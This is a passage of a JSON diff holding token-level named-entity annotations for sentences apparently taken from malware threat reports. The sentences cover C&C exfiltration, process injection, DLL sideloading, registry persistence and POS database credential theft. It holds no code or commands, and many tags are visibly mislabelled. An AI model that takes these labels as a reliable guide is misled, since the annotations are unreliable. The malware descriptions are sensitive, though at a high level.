+ "for", + "C&C", + "server", + "(execution", + "logs,", + "stolen", + "data,", + "…)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "upload", + "data", + "to", + "C&C" + ], + "ner_tags": [ + "B-Features", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrates", + "data", + "over", + "its", + "C&C", + "channel." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "acquire", + "a", + "list", + "of", + "the", + "running", + "processes", + "and", + "their", + "loaded", + "modules" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collect", + "information", + "about", + "currently", + "running", + "processes,", + "including:", + "name,", + "process", + "identifier", + "(PID),", + "parent", + "process", + "PID,", + "number", + "of", + "threads,", + "token", + "owner,", + "token", + "domain,", + "process", + "creation", + "time,", + "and", + "command", + "line" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "B-HackOrg", + "O", + "I-Features", + "O", + "I-Features", + "O", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collect", + "information", + "about", + "loaded", + "modules", + "for", + "each", + "of", + "the", + "running", + "processes" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "0x10000025get", + "handle", + "of", + "the", + "process", + "with", + "specified", + "PID" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enumerates", + "running", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "get", + "information", + "about", + "processes", + "running", + "on", + "a", + "system" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stored", + "in", + "DataS5", + "(for", + "dba)", + "and", + "DataS6", + "(for", + "micros)", + "registry", + "values", + "within", + "one", + "of", + "the", + "following", + "registry", + "keys" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "registry", + "Run", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GetComputerName", + "API" + ], + "ner_tags": [ + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "GetTickCount", + "Windows", + "API" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PeekNamedPipe", + "Windows", + "API", + "function" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "information", + "about", + "specific", + "registry", + "keys" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "queries", + "the", + "Registry", + "for", + "ORACLE", + "MICROS", + "RES", + "3700", + "POS", + "version,", + "database", + "passwords", + "and", + "other", + "configuration", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "injected", + "into", + "one", + "of", + "the", + "processes", + "specified", + "by", + "the", + "C&C" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "module", + "is", + "injected", + "into", + "one", + "of", + "the", + "processes", + "specified", + "by", + "the", + "C&C" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "injected", + "only", + "into", + "processes", + "running", + "under", + "WOW64." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "its", + "injection", + "into", + "one", + "of", + "the", + "following", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "0x10000012inject", + "and", + "execute", + "received", + "module", + "in", + "specified", + "process" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injected", + "first," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "inject", + "a", + "networking", + "module" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "inject", + "processes", + "that", + "are", + "expected", + "to", + "communicate", + "over", + "the", + "network" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "0x0AInject", + "and", + "execute", + "received", + "module", + "in", + "specified", + "process" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "0x0BInject", + "and", + "execute", + "received", + "module", + "in", + "specified", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "inject", + "and", + "execute", + "received", + "module", + "in", + "specified", + "process" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scanning", + "selected", + "IP", + "addresses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scan", + "specific", + "IP", + "addresses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IP", + "addresses", + "intended", + "for", + "scanning", + "and", + "the", + "special", + "“ping”", + "IP", + "address" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scanning", + "IPs", + "specified", + "in", + "the", + "command", + "data", + "to", + "collect", + "additional", + "information", + "about", + "the", + "environment" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scan", + "of", + "the", + "selected", + "IP", + "addresses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloaded", + "from", + "the", + "C&C", + "along", + "with", + "the", + "ModScan", + "module" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "parsing", + "payload", + "received", + "in", + "the", + "C&C", + "responses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "additional", + "payloads", + "and", + "C&C", + "commands" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TCP", + "ports", + "50123" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "2638" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "sending", + "a", + "specially", + "crafted", + "TCP", + "packet" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way" + ] + }, + { + "tokens": [ + "sends", + "a", + "hardcoded", + "TDS", + "4.2", + "&", + "5.0", + "Login", + "Packet", + "(Figure", + "6)", + "to", + "the", + "specified", + "IP", + "address", + "on", + "port", + "2638" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "transmitted", + "using", + "the", + "lightweight", + "networking", + "module," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Version", + "of", + "the", + "Oracle" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "information", + "about", + "the", + "database", + "server", + "and", + "the", + "TDS", + "versions", + "used" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sending", + "an", + "HTTP", + "Post", + "message" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "module", + "uses", + "HTTP", + "and", + "port", + "80." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "avoid", + "system", + "processes", + "that", + "might", + "attract", + "attention", + "if", + "caught", + "communicating", + "over", + "the", + "network" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "POST", + "or", + "GET", + "methods" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "HTTP", + "for", + "command", + "and", + "control" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stored", + "between", + "data", + "xml", + "tags", + "(<data>%version%</data>)", + "of", + "the", + "response", + "from", + "the", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "payload,", + "containing", + "the", + "main", + "functionality", + "of", + "the", + "dropper,", + "is", + "stored", + "in", + "the", + "dropper’s", + "resources", + "as", + "bitmaps", + "named", + "from", + "A", + "to", + "L." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "being", + "the", + "payloads", + "stored", + "in", + "the", + "resources" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "within", + "the", + "main", + "module’s", + "code." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "with", + "username", + "set", + "to", + "the", + "built-in", + "dba", + "and", + "a", + "hardcoded", + "password,", + "which", + "is", + "potentially", + "the", + "default", + "password", + "in", + "some", + "RES", + "3700", + "POS", + "versions." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hash", + "of", + "the", + "dropped", + "loader", + "to", + "change", + "with", + "each", + "execution," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "a", + "Windows", + "service" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "create", + "a", + "new", + "service", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decompiled", + "code", + "responsible", + "for", + "loading", + "the", + "payload", + "from", + "the", + "binary’s", + "resources," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Communication", + "with", + "the", + "C&C", + "is", + "encrypted", + "using", + "AES", + "in", + "CBC", + "mode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XORed", + "with", + "the", + "first", + "4", + "bytes", + "of", + "the", + "AES", + "key", + "used", + "to", + "encrypt", + "the", + "message." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "encrypts", + "communication", + "with", + "C&C", + "using", + "AES", + "in", + "CBC", + "mode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "Windows", + "Command", + "Shell", + "to", + "execute", + "the", + "initial", + "dropper." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "Registry", + "Run", + "key", + "for", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "inject", + "it’s", + "modules", + "into", + "various", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gathers", + "username", + "and", + "computer", + "name", + "from", + "victim", + "machines", + "and", + "reports", + "them", + "to", + "the", + "C&C", + "in", + "initial", + "message." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "attack", + "revolves", + "around", + "a", + "DLL", + "sideloading" + ], + "ner_tags": [ + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "sideloading", + "scenario,", + "the", + "malicious", + "loader", + "(ffmpeg.dll)", + "would", + "replace", + "the", + "clean", + "dependency;" + ], + "ner_tags": [ + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "DLL", + "sideloading" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "DLL", + "sideloading" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "encoded", + "malware" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "payload" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "malicious", + "encoded", + ".ico", + "payload" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "generate", + "the", + "HTTP", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "these", + "appear", + "to", + "be", + "maliciously", + "patched", + "versions", + "of", + "the", + "legitimate", + "ffmpeg.dll" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "GetSystemTimeAsFileTime", + "Api", + "call" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "initiates", + "the", + "payload", + "download" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "tries", + "to", + "login", + "and", + "get", + "access", + "to", + "the", + "victim", + "server", + "via", + "brute", + "force." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "tries", + "to", + "get", + "access", + "to", + "the", + "server", + "via", + "brute", + "force" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "samples", + "are", + "packed", + "with", + "UPX", + "Packer." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Upon", + "unpacking", + "a", + "sample" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "uses", + "a", + "set", + "of", + "credentials", + "that", + "is", + "hard", + "coded", + "into", + "the", + "malware", + "binary," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hard-coded", + "credentials", + "for", + "brute", + "forcing." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "from", + "the", + "decrypted", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "then", + "de-XORs", + "other", + "strings,", + "with", + "the", + "hard-coded", + "key" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Most", + "of", + "the", + "strings", + "are", + "de-XOR’d", + "in", + "a", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "simply", + "de-XOR", + "the", + "entire", + "binary" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Also", + "the", + "de-XOR’d", + "strings," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "malware", + "has", + "de-XOR’d", + "all", + "its", + "strings,", + "it", + "invokes", + "a", + "method", + "named", + "go." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "we", + "find", + "an", + "XOR", + "loop", + "that", + "decrypts", + "this", + "configuration." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "as", + "a", + "hard-coded", + "XOR", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "we", + "find", + "an", + "XOR", + "loop" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "produces", + "strings", + "including", + "a", + "commandline", + "usage:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "be", + "set", + "via", + "the", + "command-line", + "as", + "well." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "parses", + "command-line", + "options" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "data", + "will", + "be", + "published", + "on", + "our", + "TOR", + "darknet", + "sites." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "this", + "snippet", + "of", + "code", + "invokes", + "ptrace", + "with", + "PT_DENY_ATTACH", + "(0x1f)", + "which", + "will", + "kill", + "the", + "process", + "if", + "a", + "debugger", + "is", + "currently", + "attached," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "embedded", + ".NET", + "injector", + "and", + "PE", + "payload(s)." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SamFile", + "B-SecTeam", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "embedded", + "payloads", + "of", + "one", + "of", + "the", + "IronPython", + "scripts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "the", + "main", + "task", + "of", + "loading", + "malware", + "is", + "done", + "by", + "an", + "embedded", + "process", + "injector." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IronNetInjector", + "is", + "made", + "of", + "an", + "IronPython", + "script", + "that", + "contains", + "a", + ".NET", + "injector", + "and", + "one", + "or", + "more", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Contain", + "an", + "encrypted", + ".NET", + "injector", + "and", + "one", + "or", + "more", + "encrypted", + "PE", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Embedded", + ".NET", + "injector", + "and", + "payload(s)", + "are", + "encoded", + "with", + "Base64", + "and", + "encrypted", + "with", + "Rijndael." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "script", + "with", + "embedded", + ".NET", + "injector", + "and", + "ComRAT", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "the", + "embedded", + "payloads", + "in", + "the", + "IronPython", + "scripts," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "embedded", + "malware:" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "embedded", + "files", + "in", + "the", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "scripts", + "contain", + "an", + "embedded", + "PE", + "loader", + "to", + "execute", + "an", + "embedded", + "malware", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "embedded", + ".NET", + "injector" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "which", + "in", + "turn", + "injects", + "the", + "payload(s)", + "into", + "its", + "own", + "or", + "a", + "remote", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contains", + "the", + "ability", + "to", + "inject", + ".NET", + "assemblies", + "into", + "unmanaged", + "processes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "payload", + "is", + "either", + "loaded", + "into", + "its", + "own", + "process", + "or", + "a", + "remote", + "one." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "remote", + "process", + "the", + "payload", + "gets", + "injected", + "to." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "second", + "option", + "is", + "used", + "with", + "the", + "PID", + "of", + "explorer.exe", + "to", + "load", + "the", + "ComRAT", + "payload", + "reflectively", + "into", + "the", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "injector", + "is", + "its", + "ability", + "to", + "load", + "an", + "assembly", + "into", + "an", + "unmanaged", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "load", + "an", + "assembly", + "into", + "an", + "unmanaged", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "method", + "InjectAssembly", + "is", + "used", + "to", + "inject", + "a", + ".NET", + "assembly", + "into", + "a", + "native", + "process" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Function", + "and", + "variable", + "names", + "are", + "obfuscated" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Strings", + "are", + "encrypted" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scripts", + "are", + "obfuscated", + "to", + "prevent", + "easy", + "detection." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decoded", + "IronPython", + "script" + ], + "ner_tags": [ + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "the", + "Rijndael", + "decryption", + "key", + "is", + "passed." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "get", + "decoded", + "and", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decryption", + "key", + "is", + "passed", + "as", + "an", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "full-blown", + "PE", + "injection", + "tools", + "able", + "to", + "load", + "a", + "native", + "x86/64", + "payload", + "reflectively", + "into", + "a", + "remote", + "process." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "Empire’s", + "ReflectivePEInjection", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "method", + "Invoke", + "is", + "used", + "to", + "inject", + "a", + "native", + "PE", + "into", + "a", + "remote", + "process", + "and", + "InvokeVoid", + "to", + "call", + "any", + "exported", + "function", + "of", + "the", + "injected", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "As", + "a", + "command", + "line", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "task", + "XML", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "task", + "is", + "used", + "to", + "start", + "an", + "IronPython", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "task’s", + "description", + "is", + "PythonUpdateSrvc", + "and", + "it", + "runs", + "either", + "on", + "Windows", + "startup", + "when", + "a", + "user", + "logs", + "in", + "or", + "when", + "one", + "of", + "two", + "system", + "events", + "get", + "created:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "Windows", + "task", + "XML" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "task", + "file", + "is", + "then", + "used", + "to", + "create", + "a", + "task", + "which", + "in", + "turn", + "starts", + "a", + "script", + "when", + "triggered." + ], + "ner_tags": [ + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "Windows", + "task", + "XML", + "to", + "start" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "submitter", + "collected", + "the", + "files", + "from", + "different", + "places" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "is", + "accomplished", + "with", + "a", + "native", + "bootstrapper", + "DLL,", + "which", + "gets", + "injected", + "into", + "the", + "remote", + "process", + "and", + "prepares", + "it", + "so", + "a", + ".NET", + "assembly", + "can", + "be", + "injected", + "afterwards." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "gets", + "injected" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "output", + "is", + "then", + "parsed", + "to", + "the", + "targeted", + "process", + "ID", + "with", + "the", + "help", + "of", + "tasklist", + "filters." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Contains", + "the", + "imported", + "unmanaged", + "function", + 